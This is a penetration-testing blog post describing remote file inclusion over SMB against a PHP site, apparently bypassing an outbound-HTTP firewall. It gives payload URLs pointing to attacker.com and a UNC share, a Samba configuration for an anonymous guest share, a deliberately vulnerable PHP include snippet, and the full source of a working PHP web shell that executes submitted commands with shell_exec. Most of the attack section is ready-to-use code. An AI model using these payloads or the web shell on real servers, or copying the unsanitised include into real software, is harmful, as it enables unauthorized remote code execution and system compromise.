During a recent pentest, we found ourselves faced with the exploitation of a web vulnerability that we thought we had perfectly mastered. Today we are going to talk about remote file inclusion also called RFI.


RFI 101

The purpose of this article is not to teach the most neophytes among you what an RFI is, we will therefore briefly pass on it. In short, an RFI is a web attack aimed at causing the targeted site to execute code from another server. The result of this attack is the execution of the code on the server targeted by the attacker which is called RCE for remote code execution.

Here is an example of an RFI exploitation:

http://victim.com/?page=http://attacker.com/webshell.php

For more information about the exploitation of the RFI vulnerability, we highly suggest you have a look at these two very interesting articles pointed below.


WHY WINDOWS?

During this pentest, we, therefore, tried to exploit this vulnerability in vain. It's was impossible to make the server send us an HTTP request surely because of the Firewall. It was therefore necessary to be cunning and make sure to send a request on a protocol allowing access to a shared resource on the network.

So to move further, we will use SMB (Server Message Block) is a protocol that allows, among other things, to share resources across the network, if we create a Samba server on our Linux machine and share a web shell, we should be able to successfully retrieve it through our RFI.

The payload would become:

http://victim.com/?page=\\IP\SHARE\webshell.php

We are done with the theory. Let's practice now!


RFI VIA SMB POC

We will first create a Samba server on a Linux machine. This of course assumes that you first have Samba installed on your machine. We, therefore, invite you to install it now if you have not yet done so.

Install Samba

If you are using Debian or Ubuntu, Samba can be installed using the below command:

sudo apt install samba

If you are using another Linux distribution, we invite you to ask your best friend [Google][https://google.com/] how to setup Samba on your machine.

Create A Folder

mkdir ~/sambalab
chmod 0555 ~/sambalab
chown nobody:nogroup ~/sambalab

Setup the Samba configuration

To configure properly your Samba server, you must edit the file located in /etc/samba/smb.conf as per the example given below:

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = shell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[rfi]
path = /home/[username]/sambalab
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Please ensure to replace the variable [username] with the username matching your environment.

Restart the Service

systemctl restart smbd

For the purpose of this article, we'll create a small file in PHP called vuln.php in which we'll add the following vulnerable piece of code to simulate our remote file inclusions:

<?php
if(isset($_GET['page']))
{
include($_GET['page']);
}

echo "Blog POC";
?>

On another side, for our Samba server we will use a simple web shell as per the below example:

<?php
if(!empty($_POST['cmd']))
{
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- By Artyum (https://github.com/artyuum) -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>*{-webkit-box-sizing:border-box;box-sizing:border-box}body{font-family:sans-serif;color:rgba(0,0,0,.75)}main{margin:auto;max-width:850px}button,input,pre{border-radius:5px}button,input,pre{background-color:#efefef}label{display:block}input{width:100%;background-color:#efefef;border:2px solid transparent}input:focus{outline:0;background:0 0;border:2px solid #e6e6e6}button{border:none;cursor:pointer;margin-left:5px}button:hover{background-color:#e6e6e6}button,input,pre{padding:10px}.form-group{display:-webkit-box;display:-ms-flexbox;display:flex;padding:15px 0}</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if(isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>

Once here we just have to load our web shell via our browser via the following URL:

localhost/vuln.php?page=\\192.168.88.243\SHARE\webshell.php

image-1


CONCLUSION

Here we are !! We now got a nice little web shell that allows us to execute commands directly on the server. Thank you for following this less technical article than the others. However, we wanted to share this technique because we have seen very few articles about it on the net.